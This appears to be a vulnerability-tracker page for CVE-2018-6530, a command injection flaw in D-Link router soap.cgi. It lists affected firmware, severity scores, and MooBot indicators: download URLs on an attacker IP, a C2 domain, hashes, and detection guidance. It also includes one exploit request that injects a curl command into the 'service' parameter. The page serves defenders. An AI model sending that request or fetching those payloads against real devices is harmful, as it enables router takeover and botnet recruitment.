cbcvebase.
CVE-2018-6530
published 2018-03-06

CVE-2018-6530: OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L…

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-09-29
Exploited in the wild
EPSS
96.68%
99.9th percentile
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.

Affected

6 ranges
VendorProductVersion rangeFixed in
dlinkdir-818lw_firmware
dlinkdir-860l_firmware<= 1.10b04
dlinkdir-860l_firmware
dlinkdir-865l_firmware<= 1.08b01
dlinkdir-868l_firmware<= 1.12b04
dlinkdir-880l_firmware<= 1.08b04

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://159.203.15[.]179/wget.sh
urlhttp://159.203.15[.]179/wget.sh3
urlhttp://159.203.15[.]179/mips
urlhttp://159.203.15[.]179/mipsel
urlhttp://159.203.15[.]179/arm
urlhttp://159.203.15[.]179/arm5
urlhttp://159.203.15[.]179/arm6
urlhttp://159.203.15[.]179/arm7
urlhttp://159.203.15[.]179/sh4
urlhttp://159.203.15[.]179/arc
urlhttp://159.203.15[.]179/sparc
urlhttp://159.203.15[.]179/x86_64
urlhttp://159.203.15[.]179/i686
urlhttp://159.203.15[.]179/i586
ip159.203.15[.]179
domainvpn.komaru[.]today
hashB7EE57A42C6A4545AC6D6C29E1075FA1628E1D09B8C1572C848A70112D4C90A1
hash46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07CFAE075
hash36DCAF547C212B6228CA5A45A3F3A778271FBAF8E198EDE305D801BC98893D5A
hash88B858B1411992509B0F2997877402D8BD9E378E4E21EFE024D61E25B29DAA08
hashD7564C7E6F606EC3A04BE3AC63FDEF2FDE49D3014776C1FB527C3B2E3086EBAB
hash72153E51EA461452263DBB8F658BDDC8FB82902E538C2F7146C8666192893258
hash7123B2DE979D85615C35FCA99FA40E0B5FBCA25F2C7654B083808653C9E4D616
hashCC3E92C52BBCF56CCFFB6F6E2942A676B3103F74397C46A21697B7D9C0448BE6
hash188BCE5483A9BDC618E0EE9F3C961FF5356009572738AB703057857E8477A36B
hash4567979788B37FBED6EEDA02B3C15FAFE3E0A226EE541D7A0027C31FF05578E2
hash06FC99956BD2AFCEEBBCD157C71908F8CE9DDC81A830CBE86A2A3F4FF79DA5F4
hash4BFF052C7FBF3F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871
hash3B12ABA8C92A15EF2A917F7C03A5216342E7D2626B025523C62308FC799B0737
path/soap.cgi
commandPOST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1
otherw5q6he3dbrsgmclkiu4to18npavj702f
other0x336699
  • Palo Alto Networks Threat Prevention signatures 38600, 92960, 92959 and 92533 cover the exploit traffic for this campaign
  • MooBot processes print 'get haxored!' to console on execution, spawn processes with random names, and wipe the executable — monitor for self-deleting binaries and random-named child processes on IoT/Linux devices
  • MooBot C2 communications begin with magic bytes 0x336699; network detection rules should look for this signature in outbound TCP streams from IoT devices
  • Exploit HTTP request uses SOAPAction header with arbitrary serviceType#action value; detection should flag POST requests to /soap.cgi containing shell metacharacters (semicolons) in the 'service' query parameter
  • Compromised devices renamed downloaded MooBot binaries to 'Realtek' or 'Android'; hunt for these process/file names on Linux-based network devices
  • ·The MooBot C2 server was offline at time of analysis; the domain vpn.komaru[.]today may no longer be active but should still be blocked/monitored
  • ·CISA notes that CVE-2018-20114 is the patch that properly addresses this KEV entry (CVE-2018-6530); defenders should verify which CVE their firmware patch actually covers
  • ·End-of-life devices cannot be patched and should be disconnected; patching guidance only applies to still-supported models

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.